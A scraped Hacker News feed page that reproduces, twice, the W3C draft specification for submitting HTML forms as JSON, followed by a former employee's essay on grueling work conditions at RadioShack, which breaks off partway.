Hacker News from Y Combinator

Syndicate content
Links for the intellectually curious, ranked by readers. // via fulltextrssfeed.com
Updated: 2 hours 34 min ago

W3C HTML JSON form submission

2 hours 34 min ago
W3C HTML JSON form submission Abstract

This specification defines a new form encoding algorithm that enables the transmission of form data as JSON. Instead of capturing form data as essentially an array of key-value pairs which is the bread and butter of existing form encodings, it relies on a simple name attribute syntax that makes it possible to capture rich data structures as JSON directly.

Status of This Document

This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at http://www.w3.org/TR/.

This specification is an extension specification to HTML.

This document was published by the HTML Working Group as a First Public Working Draft. This document is intended to become a W3C Recommendation. If you wish to make comments regarding this document, please send them to public-html@w3.org (subscribe, archives). All comments are welcome.

Publication as a First Public Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.

This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy.

Table of Contents 1. Introduction

This section is non-normative.

JSON is commonly used as an exchange format between Web client and backend services. Enabling HTML forms to submit JSON directly simplifies implementation as it enables backend services to operate by accepting a single input format that is what's more able to encode richer structure than other form encodings (where structure has traditional had to be emulated).

User agents that implement this specification will transmit JSON data from their forms whenever the form's enctype attribute is set to application/json. During the transition period, user agents that do not support this encoding will fall back to using application/x-www-form-urlencoded. This can be detected on the server side, and the conversion algorithm described in this specification can be used to convert such data to JSON.

The path format used in input names is straightforward. To begin with, when no structuring information is present, the information will simply be captured as keys in a JSON object:

Example 1: Basic Keys

<form enctype='application/json'> <input name='name' value='Bender'> <select name='hind'> <option selected>Bitable</option> <option>Kickable</option> </select> <input type='checkbox' name='shiny' checked> </form> // produces { "name": "Bender" , "hind": "Bitable" , "shiny": true }

If a path is repeated, its value is captured as an array:

Example 2: Multiple Values

<form enctype='application/json'> <input type='number' name='bottle-on-wall' value='1'> <input type='number' name='bottle-on-wall' value='2'> <input type='number' name='bottle-on-wall' value='3'> </form> // produces { "bottle-on-wall": [1, 2, 3] }

Deeper structures can be produced using sub-keys in the path, using either string keys for objects or integer keys for arrays:

Example 3: Deeper Structure

<form enctype='application/json'> <input name='pet[species]' value='Dahut'> <input name='pet[name]' value='Hypatia'> <input name='kids[1]' value='Thelma'> <input name='kids[0]' value='Ashley'> </form> // produces { "pet": { "species": "Dahut" , "name": "Hypatia" } , "kids": ["Ashley", "Thelma"] }

As you can see above, the keys for array values can be in any order. If the array is somehow sparse, then null values are inserted:

Example 4: Sparse Arrays

<form enctype='application/json'> <input name='hearbeat[0]' value='thunk'> <input name='hearbeat[2]' value='thunk'> </form> // produces { "hearbeat": ["thunk", null, "thunk"] }

Paths can cause structures to nest to arbitrary depths:

Example 5: Even Deeper

<form enctype='application/json'> <input name='pet[0][species]' value='Dahut'> <input name='pet[0][name]' value='Hypatia'> <input name='pet[1][species]' value='Felis Stultus'> <input name='pet[1][name]' value='Billie'> </form> // produces { "pet": [ { "species": "Dahut" , "name": "Hypatia" } , { "species": "Felis Stultus" , "name": "Billie" } ] }

Really, any depth you might need.

Example 6: Such Deep

<form enctype='application/json'> <input name='wow[such][deep][3][much][power][!]' value='Amaze'> </form> // produces { "wow": { "such": { "deep": [ null , null , null , { "much": { "power": { "!": "Amaze" } } } ] } } }

The algorithm does not lose data in that every piece of information ends up being submitted. But given the path syntax, it is possible to introduce clashes such that one may attempt to set an object, an array, and a scalar value on the same key.

As seen in a previous example, trying to set multiple scalars on the same key will convert the value into an array. Trying to set a scalar value at a path that also contains an object will cause the scalar to be set on that object with the empty string key. Trying to set an array value at a path that also contains an object will cause the non-null values of that array to be set on the object using their array indices as keys. This is exemplified below:

Example 7: Merge Behaviour

<form enctype='application/json'> <input name='mix' value='scalar'> <input name='mix[0]' value='array 1'> <input name='mix[2]' value='array 2'> <input name='mix[key]' value='key key'> <input name='mix[car]' value='car key'> </form> // produces { "mix": { "": "scalar" , "0": "array 1" , "2": "array 2" , "key": "key key" , "car": "car key" } }

This may seem somewhat convoluted but it should be considered as a resilience mechanism meant to ensure that data is not lost rather than the normal usage of the JSON encoding.

As we have seen above, multiple values with the same key are upgraded to an array, and it is also possible to directly use array offsets. However there are cases in which when generating a form from existing data, one may not know if there will be one or more instances of a given key (so that without using indices one will get back at times a scalar, at times an array) and it can be slightly cumbersome to properly generate array indices (especially if the field may be modified on the client side, which would mean maintaining array indices properly there). In order to indicate that a given path must contain an array irrespective of the number of its items, and without resorting to indices, one may use the append notation (only as the final step in a path):

Example 8: Append

<form enctype='application/json'> <input name='highlander[]' value='one'> </form> // produces { "highlander": ["one"] }

The JSON encoding also supports file uploads. The values of files are themselves structured as objects and contain a type field indicating the MIME type, a name field containing the file name, and a body field with the file's content as base64.

Example 9: Files

<form enctype='application/json'> <input type='file' name='file' multiple> </form> // assuming the user has selected two text files, produces: { "file": [ { "type": "text/plain", "name": "dahut.txt", "body": "REFBQUFBQUFIVVVVVVVVVVVVVCEhIQo=" }, { "type": "text/plain", "name": "litany.txt", "body": "SSBtdXN0IG5vdCBmZWFyLlxuRmVhciBpcyB0aGUgbWluZC1raWxsZXIuCg==" } ] }

Still in the spirit of not losing information, whenever a path makes use of an invalid syntax, it is simply used whole as if it were just a key with no structure:

Example 10: Files

<form enctype='application/json'> <input name='error[good]' value='BOOM!'> <input name='error[bad' value='BOOM BOOM!'> </form> // assuming the user has selected two text files, produces: { "error": { "good": "BOOM!" } , "error[bad": "BOOM BOOM!" } 2. Conformance

As well as sections marked as non-normative, all authoring guidelines, diagrams, examples, and notes in this specification are non-normative. Everything else in this specification is normative.

The key words MUST, MUST NOT, REQUIRED, SHOULD, SHOULD NOT, RECOMMENDED, MAY, and OPTIONAL in this specification are to be interpreted as described in [RFC2119].

3. Terminology

The following terms are defined in the HTML specification. [html51]

The following terms are defined in ECMAScript. [ECMA-262]

4. The application/json encoding algorithm

For the purposes of the algorithms below, an Object corresponds to the in-memory representation for a JSONObject and an Array corresponds to the in-memory representation for a JSONArray.

The following algorithm encodes form data as application/json. It operates on the form data set obtained from constructing the form data set.

  1. Let resulting object be a new Object.
  2. For each entry in the form data set, perform these substeps:
    1. If the entry's type is file, set the is file flag.
    2. Let steps be the result of running the steps to parse a JSON encoding path on the entry's name.
    3. Let context be set to the value of resulting object.
    4. For each step in the list of steps, run the following subsubsteps:
      1. Let the current value be the value obtained by getting the step's key from the current context.
      2. Run the steps to set a JSON encoding value with the current context, the step, the current value, the entry's value, and the is file flag.
      3. Update context to be the value returned by the steps to set a JSON encoding value ran above.
  3. Let result be the value returned from calling the stringify operation with resulting object as its first parameter and the two remaining parameters left undefined.
  4. Encode result as UTF-8 and return the resulting byte stream.

Note

The algorithm above deliberately ignores any charset information (e.g. from accept-charset) and always encodes the resulting JSON as UTF-8. This is an intentionally sane behaviour.

The steps to parse a JSON encoding path are as follows:

  1. Let path be the path we are to parse.
  2. Let original be a copy of path.
  3. Let steps be an empty list of steps.
  4. Let first key be the result of collecting a sequence of characters that are not U+005B LEFT SQUARE BRACKET ("[") from the path.
  5. If first key is empty, jump to the step labelled failure below.
  6. Otherwise remove the collected characters from path and push a step onto steps with its type set to "object", its key set to the collected characters, and its last flag unset.
  7. If the path is empty, set the last flag on the last step in steps and return steps.
  8. Loop: While path is not an empty string, run these substeps:
    1. If the first two characters in path are U+005B LEFT SQUARE BRACKET ("[") followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Set the append flag on the last step in steps.
      2. Remove those two characters from path.
      3. If there are characters left in path, jump to the step labelled failure below.
      4. Otherwise jump to the step labelled loop above.
    2. If the first character in path is U+005B LEFT SQUARE BRACKET ("["), followed by one or more ASCII digits, followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Remove the first character from path.
      2. Collect a sequence of characters being ASCII digits, remove them from path, and let numeric key be the result of interpreting them as a base-ten integer.
      3. Remove the following character from path.
      4. Push a step onto steps with its type set to "array", its key set to the numeric key, and its last flag unset.
      5. Jump to the step labelled loop above.
    3. If the first character in path is U+005B LEFT SQUARE BRACKET ("["), followed by one or more characters that are not U+005D RIGHT SQUARE BRACKET, followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Remove the first character from path.
      2. Collect a sequence of characters that are not U+005D RIGHT SQUARE BRACKET, remove them from path, and let object key be the result.
      3. Remove the following character from path.
      4. Push a step onto steps with its type set to "object", its key set to the object key, and its last flag unset.
      5. Jump to the step labelled loop above.
    4. If this point in the loop is reached, jump to the step labelled failure below.
  9. For each step in steps, run the following substeps:
    1. If the step is the last step, set its last flag.
    2. Otherwise, set its next type to the type of the next step in steps.
  10. Return steps.
  11. Failure: return a list of steps containing a single step with its type set to "object", its key set to original, and its last flag set.

The steps to set a JSON encoding value are as follows:

  1. Let context be the context this algorithm is called with.
  2. Let step be the step of the path this algorithm is called with.
  3. Let current value be the current value this algorithm is called with.
  4. Let entry value be the entry value this algorithm is called with.
  5. Let is file be the is file flag this algorithm is called with.
  6. If is file is set then replace entry value with an Object have its "name" property set to the file's name, its "type" property set to the file's type, and its "body" property set to the Base64 encoding of the file's body. [RFC2045]
  7. If step has its last flag set, run the following substeps:
    1. If current value is undefined, run the following subsubsteps:
      1. If step's append flag is set, set the context's property named by the step's key to a new Array containing entry value as its only member.
      2. Otherwise, set the context's property named by the step's key to entry value.
    2. Else if current value is an Array, then get the context's property named by the step's key and push entry value onto it.
    3. Else if current value is an Object and the is file flag is not set, then run the steps to set a JSON encoding value with context set to the current value; a step with its type set to "object", its key set to the empty string, and its last flag set; current value set to the current value's property named by the empty string; the entry value; and the is file flag. Return the result.
    4. Otherwise, set the context's property named by the step's key to an Array containing current value and entry value, in this order.
    5. Return context.
  8. Otherwise, run the following substeps:
    1. If current value is undefined, run the following subsubsteps:
      1. If step's next type is "array", set the context's property named by the step's key to a new empty Array and return it.
      2. Otherwise,set the context's property named by the step's key to a new empty Object and return it.
    2. Else if current value is an Object, then return the value of the context's property named by the step's key.
    3. Else if current value is an Array, then rub the following subsubsteps:
      1. If step's next type is "array", return current value.
      2. Otherwise, run the following subsubsubsteps:
        1. Let object be a new empty Object.
        2. For each item and zero-based index i in current value, if item is not undefined then set a property of object named i to item.
        3. Otherwise, set the context's property named by the step's key to object.
        4. Return object.
    4. Otherwise, run the following subsubsteps:
      1. Let object be a new Object with a property named by the empty string set to current value.
      2. Set the context's property named by the step's key to object.
      3. Return object.
5. Form Submission

Given that there exist deployed services using JSON and ambient authentication, and given that form requests are not protected by the same-origin policy by default, if this encoding were left wide open then a number of attacks would become possible. Because of this, when using the application/json form encoding the same-origin policy is enforced.

When the form submission algorithm is invoked in order to Submit as entity with enctype set to application/json and entity body set to the result of applying the application/json encoding algorithm, causing the browsing context to navigate, the user agent MUST invoke the fetch algorithm with the force same-origin flag.

6. Acknowledgements

Thanks to Philippe Le Hégaret for serving as a sounding board for the first version of the encoding algorithm.

A. References A.1 Normative references
[ECMA-262]
ECMAScript Language Specification, Edition 5.1. June 2011. URL: http://www.ecma-international.org/publications/standards/Ecma-262.htm
[RFC2045]
N. Freed and N. Borenstein. Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies. November 1996. URL: http://www.ietf.org/rfc/rfc2045.txt
[RFC2119]
S. Bradner. Key words for use in RFCs to Indicate Requirement Levels. March 1997. Internet RFC 2119. URL: http://www.ietf.org/rfc/rfc2119.txt
[html51]
Robin Berjon; Steve Faulkner; Travis Leithead; Erika Doyle Navara; Edward O'Connor; Silvia Pfeiffer. HTML 5.1. 4 February 2014. W3C Working Draft. URL: http://www.w3.org/TR/html51/
W3C HTML JSON form submission Abstract

This specification defines a new form encoding algorithm that enables the transmission of form data as JSON. Instead of capturing form data as essentially an array of key-value pairs which is the bread and butter of existing form encodings, it relies on a simple name attribute syntax that makes it possible to capture rich data structures as JSON directly.

Status of This Document

This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at http://www.w3.org/TR/.

This specification is an extension specification to HTML.

This document was published by the HTML Working Group as a First Public Working Draft. This document is intended to become a W3C Recommendation. If you wish to make comments regarding this document, please send them to public-html@w3.org (subscribe, archives). All comments are welcome.

Publication as a First Public Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.

This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy.

Table of Contents 1. Introduction

This section is non-normative.

JSON is commonly used as an exchange format between Web client and backend services. Enabling HTML forms to submit JSON directly simplifies implementation as it enables backend services to operate by accepting a single input format that is what's more able to encode richer structure than other form encodings (where structure has traditional had to be emulated).

User agents that implement this specification will transmit JSON data from their forms whenever the form's enctype attribute is set to application/json. During the transition period, user agents that do not support this encoding will fall back to using application/x-www-form-urlencoded. This can be detected on the server side, and the conversion algorithm described in this specification can be used to convert such data to JSON.

The path format used in input names is straightforward. To begin with, when no structuring information is present, the information will simply be captured as keys in a JSON object:

Example 1: Basic Keys

<form enctype='application/json'> <input name='name' value='Bender'> <select name='hind'> <option selected>Bitable</option> <option>Kickable</option> </select> <input type='checkbox' name='shiny' checked> </form> // produces { "name": "Bender" , "hind": "Bitable" , "shiny": true }

If a path is repeated, its value is captured as an array:

Example 2: Multiple Values

<form enctype='application/json'> <input type='number' name='bottle-on-wall' value='1'> <input type='number' name='bottle-on-wall' value='2'> <input type='number' name='bottle-on-wall' value='3'> </form> // produces { "bottle-on-wall": [1, 2, 3] }

Deeper structures can be produced using sub-keys in the path, using either string keys for objects or integer keys for arrays:

Example 3: Deeper Structure

<form enctype='application/json'> <input name='pet[species]' value='Dahut'> <input name='pet[name]' value='Hypatia'> <input name='kids[1]' value='Thelma'> <input name='kids[0]' value='Ashley'> </form> // produces { "pet": { "species": "Dahut" , "name": "Hypatia" } , "kids": ["Ashley", "Thelma"] }

As you can see above, the keys for array values can be in any order. If the array is somehow sparse, then null values are inserted:

Example 4: Sparse Arrays

<form enctype='application/json'> <input name='hearbeat[0]' value='thunk'> <input name='hearbeat[2]' value='thunk'> </form> // produces { "hearbeat": ["thunk", null, "thunk"] }

Paths can cause structures to nest to arbitrary depths:

Example 5: Even Deeper

<form enctype='application/json'> <input name='pet[0][species]' value='Dahut'> <input name='pet[0][name]' value='Hypatia'> <input name='pet[1][species]' value='Felis Stultus'> <input name='pet[1][name]' value='Billie'> </form> // produces { "pet": [ { "species": "Dahut" , "name": "Hypatia" } , { "species": "Felis Stultus" , "name": "Billie" } ] }

Really, any depth you might need.

Example 6: Such Deep

<form enctype='application/json'> <input name='wow[such][deep][3][much][power][!]' value='Amaze'> </form> // produces { "wow": { "such": { "deep": [ null , null , null , { "much": { "power": { "!": "Amaze" } } } ] } } }

The algorithm does not lose data in that every piece of information ends up being submitted. But given the path syntax, it is possible to introduce clashes such that one may attempt to set an object, an array, and a scalar value on the same key.

As seen in a previous example, trying to set multiple scalars on the same key will convert the value into an array. Trying to set a scalar value at a path that also contains an object will cause the scalar to be set on that object with the empty string key. Trying to set an array value at a path that also contains an object will cause the non-null values of that array to be set on the object using their array indices as keys. This is exemplified below:

Example 7: Merge Behaviour

<form enctype='application/json'> <input name='mix' value='scalar'> <input name='mix[0]' value='array 1'> <input name='mix[2]' value='array 2'> <input name='mix[key]' value='key key'> <input name='mix[car]' value='car key'> </form> // produces { "mix": { "": "scalar" , "0": "array 1" , "2": "array 2" , "key": "key key" , "car": "car key" } }

This may seem somewhat convoluted but it should be considered as a resilience mechanism meant to ensure that data is not lost rather than the normal usage of the JSON encoding.

As we have seen above, multiple values with the same key are upgraded to an array, and it is also possible to directly use array offsets. However there are cases in which when generating a form from existing data, one may not know if there will be one or more instances of a given key (so that without using indices one will get back at times a scalar, at times an array) and it can be slightly cumbersome to properly generate array indices (especially if the field may be modified on the client side, which would mean maintaining array indices properly there). In order to indicate that a given path must contain an array irrespective of the number of its items, and without resorting to indices, one may use the append notation (only as the final step in a path):

Example 8: Append

<form enctype='application/json'> <input name='highlander[]' value='one'> </form> // produces { "highlander": ["one"] }

The JSON encoding also supports file uploads. The values of files are themselves structured as objects and contain a type field indicating the MIME type, a name field containing the file name, and a body field with the file's content as base64.

Example 9: Files

<form enctype='application/json'> <input type='file' name='file' multiple> </form> // assuming the user has selected two text files, produces: { "file": [ { "type": "text/plain", "name": "dahut.txt", "body": "REFBQUFBQUFIVVVVVVVVVVVVVCEhIQo=" }, { "type": "text/plain", "name": "litany.txt", "body": "SSBtdXN0IG5vdCBmZWFyLlxuRmVhciBpcyB0aGUgbWluZC1raWxsZXIuCg==" } ] }

Still in the spirit of not losing information, whenever a path makes use of an invalid syntax, it is simply used whole as if it were just a key with no structure:

Example 10: Files

<form enctype='application/json'> <input name='error[good]' value='BOOM!'> <input name='error[bad' value='BOOM BOOM!'> </form> // assuming the user has selected two text files, produces: { "error": { "good": "BOOM!" } , "error[bad": "BOOM BOOM!" } 2. Conformance

As well as sections marked as non-normative, all authoring guidelines, diagrams, examples, and notes in this specification are non-normative. Everything else in this specification is normative.

The key words MUST, MUST NOT, REQUIRED, SHOULD, SHOULD NOT, RECOMMENDED, MAY, and OPTIONAL in this specification are to be interpreted as described in [RFC2119].

3. Terminology

The following terms are defined in the HTML specification. [html51]

The following terms are defined in ECMAScript. [ECMA-262]

4. The application/json encoding algorithm

For the purposes of the algorithms below, an Object corresponds to the in-memory representation for a JSONObject and an Array corresponds to the in-memory representation for a JSONArray.

The following algorithm encodes form data as application/json. It operates on the form data set obtained from constructing the form data set.

  1. Let resulting object be a new Object.
  2. For each entry in the form data set, perform these substeps:
    1. If the entry's type is file, set the is file flag.
    2. Let steps be the result of running the steps to parse a JSON encoding path on the entry's name.
    3. Let context be set to the value of resulting object.
    4. For each step in the list of steps, run the following subsubsteps:
      1. Let the current value be the value obtained by getting the step's key from the current context.
      2. Run the steps to set a JSON encoding value with the current context, the step, the current value, the entry's value, and the is file flag.
      3. Update context to be the value returned by the steps to set a JSON encoding value ran above.
  3. Let result be the value returned from calling the stringify operation with resulting object as its first parameter and the two remaining parameters left undefined.
  4. Encode result as UTF-8 and return the resulting byte stream.

Note

The algorithm above deliberately ignores any charset information (e.g. from accept-charset) and always encodes the resulting JSON as UTF-8. This is an intentionally sane behaviour.

The steps to parse a JSON encoding path are as follows:

  1. Let path be the path we are to parse.
  2. Let original be a copy of path.
  3. Let steps be an empty list of steps.
  4. Let first key be the result of collecting a sequence of characters that are not U+005B LEFT SQUARE BRACKET ("[") from the path.
  5. If first key is empty, jump to the step labelled failure below.
  6. Otherwise remove the collected characters from path and push a step onto steps with its type set to "object", its key set to the collected characters, and its last flag unset.
  7. If the path is empty, set the last flag on the last step in steps and return steps.
  8. Loop: While path is not an empty string, run these substeps:
    1. If the first two characters in path are U+005B LEFT SQUARE BRACKET ("[") followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Set the append flag on the last step in steps.
      2. Remove those two characters from path.
      3. If there are characters left in path, jump to the step labelled failure below.
      4. Otherwise jump to the step labelled loop above.
    2. If the first character in path is U+005B LEFT SQUARE BRACKET ("["), followed by one or more ASCII digits, followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Remove the first character from path.
      2. Collect a sequence of characters being ASCII digits, remove them from path, and let numeric key be the result of interpreting them as a base-ten integer.
      3. Remove the following character from path.
      4. Push a step onto steps with its type set to "array", its key set to the numeric key, and its last flag unset.
      5. Jump to the step labelled loop above.
    3. If the first character in path is U+005B LEFT SQUARE BRACKET ("["), followed by one or more characters that are not U+005D RIGHT SQUARE BRACKET, followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Remove the first character from path.
      2. Collect a sequence of characters that are not U+005D RIGHT SQUARE BRACKET, remove them from path, and let object key be the result.
      3. Remove the following character from path.
      4. Push a step onto steps with its type set to "object", its key set to the object key, and its last flag unset.
      5. Jump to the step labelled loop above.
    4. If this point in the loop is reached, jump to the step labelled failure below.
  9. For each step in steps, run the following substeps:
    1. If the step is the last step, set its last flag.
    2. Otherwise, set its next type to the type of the next step in steps.
  10. Return steps.
  11. Failure: return a list of steps containing a single step with its type set to "object", its key set to original, and its last flag set.

The steps to set a JSON encoding value are as follows:

  1. Let context be the context this algorithm is called with.
  2. Let step be the step of the path this algorithm is called with.
  3. Let current value be the current value this algorithm is called with.
  4. Let entry value be the entry value this algorithm is called with.
  5. Let is file be the is file flag this algorithm is called with.
  6. If is file is set then replace entry value with an Object have its "name" property set to the file's name, its "type" property set to the file's type, and its "body" property set to the Base64 encoding of the file's body. [RFC2045]
  7. If step has its last flag set, run the following substeps:
    1. If current value is undefined, run the following subsubsteps:
      1. If step's append flag is set, set the context's property named by the step's key to a new Array containing entry value as its only member.
      2. Otherwise, set the context's property named by the step's key to entry value.
    2. Else if current value is an Array, then get the context's property named by the step's key and push entry value onto it.
    3. Else if current value is an Object and the is file flag is not set, then run the steps to set a JSON encoding value with context set to the current value; a step with its type set to "object", its key set to the empty string, and its last flag set; current value set to the current value's property named by the empty string; the entry value; and the is file flag. Return the result.
    4. Otherwise, set the context's property named by the step's key to an Array containing current value and entry value, in this order.
    5. Return context.
  8. Otherwise, run the following substeps:
    1. If current value is undefined, run the following subsubsteps:
      1. If step's next type is "array", set the context's property named by the step's key to a new empty Array and return it.
      2. Otherwise,set the context's property named by the step's key to a new empty Object and return it.
    2. Else if current value is an Object, then return the value of the context's property named by the step's key.
    3. Else if current value is an Array, then rub the following subsubsteps:
      1. If step's next type is "array", return current value.
      2. Otherwise, run the following subsubsubsteps:
        1. Let object be a new empty Object.
        2. For each item and zero-based index i in current value, if item is not undefined then set a property of object named i to item.
        3. Otherwise, set the context's property named by the step's key to object.
        4. Return object.
    4. Otherwise, run the following subsubsteps:
      1. Let object be a new Object with a property named by the empty string set to current value.
      2. Set the context's property named by the step's key to object.
      3. Return object.
5. Form Submission

Given that there exist deployed services using JSON and ambient authentication, and given that form requests are not protected by the same-origin policy by default, if this encoding were left wide open then a number of attacks would become possible. Because of this, when using the application/json form encoding the same-origin policy is enforced.

When the form submission algorithm is invoked in order to Submit as entity with enctype set to application/json and entity body set to the result of applying the application/json encoding algorithm, causing the browsing context to navigate, the user agent MUST invoke the fetch algorithm with the force same-origin flag.

6. Acknowledgements

Thanks to Philippe Le Hégaret for serving as a sounding board for the first version of the encoding algorithm.

A. References A.1 Normative references
[ECMA-262]
ECMAScript Language Specification, Edition 5.1. June 2011. URL: http://www.ecma-international.org/publications/standards/Ecma-262.htm
[RFC2045]
N. Freed and N. Borenstein. Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies. November 1996. URL: http://www.ietf.org/rfc/rfc2045.txt
[RFC2119]
S. Bradner. Key words for use in RFCs to Indicate Requirement Levels. March 1997. Internet RFC 2119. URL: http://www.ietf.org/rfc/rfc2119.txt
[html51]
Robin Berjon; Steve Faulkner; Travis Leithead; Erika Doyle Navara; Edward O'Connor; Silvia Pfeiffer. HTML 5.1. 4 February 2014. W3C Working Draft. URL: http://www.w3.org/TR/html51/

A Eulogy for RadioShack

2 hours 34 min ago

This may very well be RadioShack's final holiday season. Jon, a former employee, looks back on a strange, craven, five thousand-fingered strip-mall monster from a forgotten age.

RadioShack won't be the only store to open on Thanksgiving Day, but it might be the only one of its particular makeup to do so. This isn't Walmart or a call center, in which volunteers who want overtime pay can be chosen first. Most RadioShack stores have just a handful of employees, most or all of whom will work Thanksgiving whether they want to or not. Retail employees have very, very little in the way of perks, of things that are understood to be sacred. Having Thanksgiving Day to themselves was one of them.

After some pushback from its employees, RadioShack gave in just a little: after originally planning to open from 8 a.m. to midnight on Thanksgiving, its stores will now close for a few hours in the middle of the day so that its folks can have a little bit of family time.

RadioShack is a company of massive real estate, and is peddling a business model that is completely unviable in 2014. It's very likely to go extinct soon, and I doubt there's anything its operators can do about it. In scenarios like this one, there aren't happy stories or easy answers, and if this were any other company, I'd concede that, perhaps, opening on Thanksgiving is a regrettable but necessary stab at saving the company, employees and all.

But as this company has spent the last decade-plus trying to save itself, the happiness of the employees has always been the first to go overboard. Its store managers are worked so hard that they become unhappy, half-awake shadows of themselves. Labor laws have been brazenly ignored. Untold hours of labor haven't been paid for (when I quit, on good terms and with two weeks' notice, they withheld my final paychecks for months and wouldn't tell me why). Lawyers have been sent to shut down websites that have bad things to say about RadioShack. Employees who make a few dimes over minimum wage are pressured, shamed, and yelled at as though they're brokering million-dollar deals.

RadioShack is a rotten place to work, generally not a very good place to shop, and an untenable business to run. Everyone involved loses.

These are stories from my three and a half years as a RadioShack employee.

I.

I really hope Black Fridays aren't like they were a decade ago, but I doubt much has changed.

During the 2004 holiday season, I worked in a Radio Shack situated in a dying mall with virtually no foot traffic. It was hard enough making much in the way of commissions when the sales were split between our usual staff of three or four employees. Radio Shack is a corporation dedicated to the prolonged destruction of the individual, so it tripled our staff right before Black Friday, ensuring that no one would make any money.

And during this season, Radio Shack also decided to abandon newspaper inserts, which had always been the lifeblood of its advertising. There was no explanation given for this, but it ensured that we would make a fraction of zero money.

4:30 a.m. We show up an hour and a half before the store opens, as demanded by the district office.  We stand around and do nothing.
6:00 a.m. We all line up in expectation of hordes of customers. Six on one side of the store, six on the other side, pallbearers of an invisible casket. The manager opens the doors. No one is waiting on the other end.
7:00 a.m. Nobody has walked into the store. Nobody has been seen even walking past the store. This infuriates the manager, who at this juncture elects to fire one employee, right there on the spot, because her sweater is a shade of red that is inconsistent with the dress code.
8:00 a.m. Someone almost walks in. She kind of turns toward the store, sees 11 of us just standing and staring at her, and turns a 180. Don't blame you, ma'am.
9:00 a.m. First customer! Someone just walked in and bought a cordless phone battery. One of us would have made approximately 23 cents on the sale (18 cents after taxes), except you don't start making any sales commission until you surpass a monthly sales figure that is usually unreachable and arbitrarily set. (I worked at Radio Shack for 43 months, and barely hit this mark once.)
12:00 p.m. We've sold maybe $90 worth of stuff. Two more employees walk out and don't come back.
2:00 p.m. A couple comes in to return a pair of cell phones I sold them a couple weeks back. I received about $40 for the sale on my last paycheck, and now they will take $40 out of my next paycheck. Voiding a cell phone contract is a process that takes an hour or so of waiting on the phone and talking to three or four different gatekeepers. This time, it's even longer, because someone errantly slapped them with a $200 cancellation fee. My manager gets wind of this and starts screaming at me: "JON, WHAT DID YOU DO? WHAT THE FUCK DID YOU DO?" She then tries to initiate a shouting match with my customers, who don't bite.
3:00 p.m. Two more employees quit, one because the manager has refused to give her a lunch break over a 10.5-hour shift.
9:00 p.m. Mercifully, and with sales numbers that are beyond abysmal, the district office tells us to close the store and not to remain open until midnight, as planned. Someone else came in to return a phone, so my sales are now about $60 in the hole. I make $5.45 an hour, and have worked a 16.5-hour shift, so that's about $90. Minus the $60 I've lost, that's $30. So today, I have made about $1.80 per hour, for a shift of nearly 17 hours. Before taxes.
9:45 p.m. Ha ha ha ha I am still at the store, counting the money and helping clean up and such, but not getting paid for it. This is Radio Shack's thing: if you're working while the store's closed, they might decide to pay you and they might not. I worked countless hours they never paid me for; this is one. We finally close up. On the way to the parking lot, I ask my manager whether I can take Christmas Eve off; this would allow me barely enough time to make the seven-hour drive home to Kentucky to see my family, then head back. She doesn't say no. She yells no, and tells me I'm not special.

II.

That story paints that store manager as the worst woman on Earth, which I swear is not true. She was at heart a good person, and had major stress/anxiety issues, and "RadioShack manager" is just about the worst position for a person with those issues (or any person). Being a manager made her miserable and unhealthy, as it tends to do to people.

I had well over a dozen different managers across my RadioShack career. One of them, who was also a friend of mine, dealt with it by getting loaded. I'd often give him rides to and from work, and on the way home, he'd ask me to swing by the gas station so he could pick up a 24-pack of Bud Light. Since I wasn't 21, this was a pretty sweet deal. I'd drink one or two beers with him in the parking lot, and then he'd go inside and kill the rest in a single night. I should have maybe said something, or done something, but I was 20 and there were things that didn't occur to me then.

III.

Another manager of mine staggered through life in a state of perpetual exhaustion. Our entire store had exactly three employees; my co-worker and I worked 40 or 50 hours per week, and he worked a minimum of 70 if he was lucky. We often had just one employee at the store at any given time, and sometimes, when there weren't any customers in the store, he'd take a nap in the back room. More than once, while he was back there, someone would walk in and shoplift hundreds of dollars' worth of stuff off the shelves and walk out in plain sight.

He just didn't give a shit. Sometimes, due to various obligations, he was working 80, 90 hours a week. He was pretty low on his hierarchy of needs: he didn't care about selling things, or making commission, or running a good store, or climbing any kind of career ladder. He was just trying to survive. He was trying to keep being an alive person for another hour. He made $23,000 a year.

IV.

He and I sometimes saw our work week increase by five to a dozen hours because of inventories. Most folks who have worked in retail are probably familiar with this. Once every couple months, we'd have to stay after hours and count inventory. The store computer would print out a novel of every single item we were supposed to have in stock, from TVs to transistors to batteries, and then we'd have to root through the entire store and make sure we had all of it.

This could mean staying until midnight on a good inventory, or staying until five in the morning, depending on how obsessive my manager happened to be. Radio Shack could very easily have scheduled these regularly and in advance, as a courtesy to its employees, but Radio Shack is a craven and unfeeling entity that issued what I can only describe as open contempt of those they employed. The higher-ups preferred to spring them on us with maybe a day's notice.

That is a major violation of labor laws, but they didn't care. Sometimes they'd call an hour before the store closed to let us know we were staying there until two in the morning. We could comply or be fired.

V.

